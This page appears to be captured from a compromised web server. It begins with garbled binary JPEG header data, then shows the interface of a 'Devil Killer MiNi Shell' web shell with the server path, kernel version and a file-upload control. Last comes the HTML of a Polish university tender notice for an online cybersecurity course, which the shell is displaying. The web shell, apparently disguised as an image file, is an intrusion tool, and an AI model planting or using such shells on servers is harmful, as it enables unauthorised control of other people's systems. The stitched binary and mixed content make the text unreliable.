JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230223/0010838101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Usługa przeprowadzenia kursu informatycznego z zakresu cyberbezpieczeństwa w ramach projektu „Centrum Rozwoju Kompetencji Politechniki Łódzkiej” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Politechnika Łódzka</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Centrum Obsługi Projektów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001583</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żeromskiego</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">90-924</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp.rcop@info.p.lodz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.p.lodz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Usługa przeprowadzenia kursu informatycznego z zakresu cyberbezpieczeństwa w ramach projektu „Centrum Rozwoju Kompetencji Politechniki Łódzkiej” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-96db12af-b36d-11ed-b8d9-2a18c1f2976f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00108381</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-02-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Centrum Rozwoju Kompetencji Politechniki Łódzkiej” współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Wiedza Edukacja Rozwój na lata 2014-2020, nr wniosku POWR.03.01.00-IP.08-00-3MU/18, Oś priorytetowa III Szkolnictwo wyższe dla gospodarki i rozwoju, Działania 3.1. Kompetencje w szkolnictwie wyższym. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://plodz.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://plodz.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia <br/>18 lipca 2002 r. o świadczeniu usług drogą elektroniczną. <br/>2.	Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 ustawy Pzp, podmiotowe i przedmiotowe środki dowodowe, w tym oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp (jeżeli jest wymagane), pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a także oświadczenie, o jakim mowa w Rozdziale IX ust. 1 SWZ, podmiotowe i przedmiotowe środki dowodowe, oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby składa się, pod rygorem nieważności, w formie elektronicznej (tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <br/>3.	Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują:<br/>1)	poprzez Platformę, dostępną pod adresem: https://plodz.ezamawiajacy.pl w zakładce „Korespondencja”.<br/>4.	Rejestracja i korzystanie z Platformy jest bezpłatne. Dokonując rejestracji, Wykonawca akceptuje regulamin korzystania z Platformy.<br/>5.	Ogólne warunki korzystania z Platformy:<br/>1)	zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Politechniki Łódzkiej https://plodz.ezamawiajacy.pl/servlet/HomeServlet lub https://oneplace.marketplanet.pl.<br/>2)	Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „Zarejestruj się”.<br/>3)	Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci elektronicznej. Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informacje, o możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować się pod numerem telefonu podanym w w/w potwierdzeniu.<br/>4)	Po założeniu konta Wykonawca ma możliwość złożenia oferty w postępowaniu.<br/>5)	Zamawiający określa dopuszczalny format kwalifikowanego podpisu elektronicznego jako: <br/>a)	dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES;<br/>b)	dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć oprócz podpisanego dokumentu oddzielny plik z podpisem.<br/>6)	Zamawiający określa niezbędne wymagania sprzętowo – aplikacyjne umożliwiające pracę na Platformie Zakupowej, tj.:<br/>a)	Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>b)	Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>c)	Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>d)	Włączona obsługa JavaScript;<br/>e)	Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>Z uwagi na ograniczoną liczbę znaków, ciąg dalszy znajduje się w Rozdziale XIII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia <br/>2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych, Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: <br/>1.	Do czynności podejmowanych przez Zamawiającego i Wykonawców w postępowaniu o udzielenie zamówienia stosuje się przepisy ustawy Pzp oraz aktów wykonawczych wydanych na jej podstawie, a w sprawach nieuregulowanych przepisy ustawy z dnia 23 kwietnia 1964 r. Kodeks cywilny. <br/>2.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), dalej „RODO”, Zamawiający informuję, że: <br/>1)	administratorem danych osobowych jest: Politechnika Łódzka, ul. Żeromskiego 116, 90-924 Łódź,<br/>2)	inspektor ochrony danych osobowych w Politechnice Łódzkiej: kontakt email: rbi@adm.p.lodz.pl,<br/>3)	przekazane dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu wypełnienia obowiązku prawnego ciążącego na administratorze, związanym z niniejszym postępowaniem prowadzonym zgodnie z zasadą konkurencyjności,<br/>4)	przekazane dane osobowe będę przetwarzane wyłącznie w celu przeprowadzenia postępowania o udzielenie zamówienia publicznego zgodnie z ustawą Pzp oraz realizacji Projektu, w szczególności potwierdzenia kwalifikowalności wydatków, udzielenia wsparcia, monitoringu, ewaluacji, kontroli, audytu <br/>i sprawozdawczości, <br/>5)	przekazane dane osobowe mogą zostać udostępnione organom upoważnionym zgodnie z obowiązującym prawem,<br/>6)	dane osobowe będą przechowywane zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia do momentu wygaśnięcia obowiązku przechowywania danych wynikających z przepisów prawa,<br/>7)	obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z przepisów ustawy Pzp,<br/>8)	w odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany stosowanie do art. 22 RODO,<br/>9)	posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do swoich danych osobowych,<br/>b) na podstawie art. 16 RODO prawo do sprostowania swoich danych osobowych,<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO,<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Wykonawcy nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CRK/383.8/2023/1/8</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest wykonanie profesjonalnej edukacyjnej usługi szkoleniowej polegającej na zorganizowaniu i przeprowadzeniu w trybie online kompleksowego kursu informatycznego z zakresu cyberbezpieczeństwa w ramach projektu pn. „Centrum Rozwoju Kompetencji Politechniki Łódzkiej” współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Wiedza Edukacja Rozwój na lata 2014-2020, nr wniosku POWR.03.01.00-IP.08-00-3MU/18, Oś priorytetowa III Szkolnictwo wyższe dla gospodarki i rozwoju, Działania 3.1. Kompetencje w szkolnictwie wyższym. <br/>2.	Przedmiotowy kurs obejmuje 5 modułów, tj.:<br/>1)	Usługi przeprowadzenia kursów informatycznych z zakresu cyberbezpieczeństwa w ramach projektu „Centrum Rozwoju Kompetencji Politechniki Łódzkiej” – moduł nr 1 – Cybersecurity Fundamentals w łącznym wymiarze 120 godzin;<br/>2)	Usługi przeprowadzenia kursów informatycznych z zakresu cyberbezpieczeństwa w ramach projektu „Centrum Rozwoju Kompetencji Politechniki Łódzkiej” – moduł nr 2 – Cloud Security w łącznym wymiarze 32 godzin;<br/>3)	Usługi przeprowadzenia kursów informatycznych z zakresu cyberbezpieczeństwa w ramach projektu „Centrum Rozwoju Kompetencji Politechniki Łódzkiej” – moduł nr 3 – Network Security w łącznym wymiarze 80 godzin;<br/>4)	Usługi przeprowadzenia kursów informatycznych z zakresu cyberbezpieczeństwa w ramach projektu „Centrum Rozwoju Kompetencji Politechniki Łódzkiej” – moduł nr 4 – Cyber Infratructure &amp; Technology w łącznym wymiarze 120 godzin;<br/>5)	Usługi przeprowadzenia kursów informatycznych z zakresu cyberbezpieczeństwa w ramach projektu „Centrum Rozwoju Kompetencji Politechniki Łódzkiej” – moduł nr 5 – Cloud Security oraz Network Security w wymiarze 16 godzin w odniesieniu do kursu Cloud Security oraz 20 godzin do kursu Network Security. Uczestnikami kursu w przedmiotowym module będą obywatele Ukrainy.<br/>3.	Wykonawca zobowiązany jest do zapewnienia i udostępnienia uczestnikom kursu wyznaczonym przez Zamawiającego odpowiedniego narzędzia technologicznego (tj. oprogramowania, platformy edukacyjnej) umożliwiającego udział w szkoleniu prowadzonym w formie cyfrowego przekazu audio-wideo w trybie rzeczywistym, umożliwiającego uczestniczenie w szkoleniu w sposób czynny i aktywny z możliwością zadawania pytań w czasie rzeczywistym, uwzględniającego powszechne standardy usług internetowych oraz gwarantującego należytą jakość realizowanych połączeń internetowych niezależnie od liczebności utworzonej grupy szkoleniowej. Narzędzie technologiczne, o którym mowa w zdaniu pierwszym musi pochodzić z legalnego źródła, do którego Wykonawca posiada określone prawa własności lub do korzystania. Wykonawca ponosi pełną i wyłączną odpowiedzialność za wszelkie kwestie prawne wynikłe w trakcie trwania umowy, jak i po jej wygaśnięciu, związane z korzystaniem z praw do własności intelektualnej osób trzecich – w szczególności do materiałów dydaktycznych, narzędzi technologicznych lub innych treści udostępnionych uczestnikom przez Wykonawcę.<br/>4.	Wybrane narzędzie musi zapewnić możliwość przekazu audio-wideo w jakości FullHD (1920x1080) oraz umożliwić udostępnianie ekranu prowadzącego spotkanie lub przygotowanych multimedialnych materiałów dydaktycznych w dodatkowym kanale (strumieniu). Zamawiający wymaga aby płynność przekazu w strumieniu z prezentacją bądź materiałem filmowym wynosiła minimum 15 klatek na sekundę. <br/>5.	Szczegółowy opis przedmiotu zamówienia dla każdego modułu zawiera Załącznik nr 2 SWZ. <br/>6.	Opis przedmiotu zamówienia nie podlega interpretacji. Jeśli zapisy SWZ są zdaniem Wykonawcy niejasne, niepełne, nieprecyzyjne lub błędne, to Wykonawca ma obowiązek zadać pytanie przed złożeniem Oferty.<br/>7.	Zakres praw i obowiązków związanych z realizacją niniejszego zamówienia zawiera załącznik nr 4 do SWZ – wzór umowy.<br/>8.	Wszystkie wymagania określone w dokumentach wskazanych powyżej stanowią wymagania minimalne, a ich spełnienie jest obligatoryjne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7) ustawy Pzp.<br/><br/>Przewiduje się udzielenie zamówienia polegającego na powtórzeniu podobnych usług w wysokości nieprzekraczającej 50% wartości szacunkowej zamówienia podstawowego. Zamówienia te polegać będą na powtórzeniu usług podobnych do usług stanowiących przedmiot niniejszego zamówienia tj. w zakresie przedmiotowym (rodzajowym) dotyczącym kursu informatycznego z obszaru:<br/>- Cybersecurity Fundamentals;<br/>- Cloud Security;<br/>- Network Security;<br/>- Cyber Infratructure &amp; Technology;<br/>- Cloud Security oraz Network Security dla obywateli Ukrainy.<br/><br/>Zamówienia zostaną udzielone na podstawie negocjacji z dotychczasowym Wykonawcą na warunkach określonych <br/>w umowie podstawowej po przeprowadzeniu odrębnego postępowania o udzielenie zamówienia publicznego w trybie z wolnej ręki a jeżeli wartość szacunkowa będzie mniejsza od kwoty, o której mowa w art. 2 ust. 1 pkt 1 ustawy Pzp tylko po przeprowadzenie negocjacji.<br/><br/>Warunkiem udzielania zamówień, o których mowa powyżej jest wystąpienie zwiększonych potrzeb po stronie Zamawiającego, wynikających z obiektywnych przyczyn, w toku świadczenia usług w ramach realizacji Umowy.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby wyznaczonej do wykonania usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Praktyczny program nauczania zapewniony poprzez dostęp do platformy umożliwiającej udział uczestników kursu w rzeczywistych symulacjach ataków hakerskich</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale VIII SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4)	zdolności technicznej lub zawodowej:<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że:<br/>4.1 w okresie ostatnich 3** (trzech) lat, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie – wykonał należycie co najmniej 2 (dwie) usługi* polegające na przygotowaniu, organizacji i przeprowadzeniu kursów informatycznych z zakresu cyberbezpieczeństwa na rzecz administracji publicznej lub samorządów zawodowych bądź uczelni wyższych lub instytucji badawczych o wartości co najmniej 300 000,00 zł brutto każda wraz z podaniem dat wykonania i podmiotu na rzecz, którego usługa została wykonana. <br/><br/>Zamawiający rozumie przez kurs co najmniej dwudniowe wydarzenie 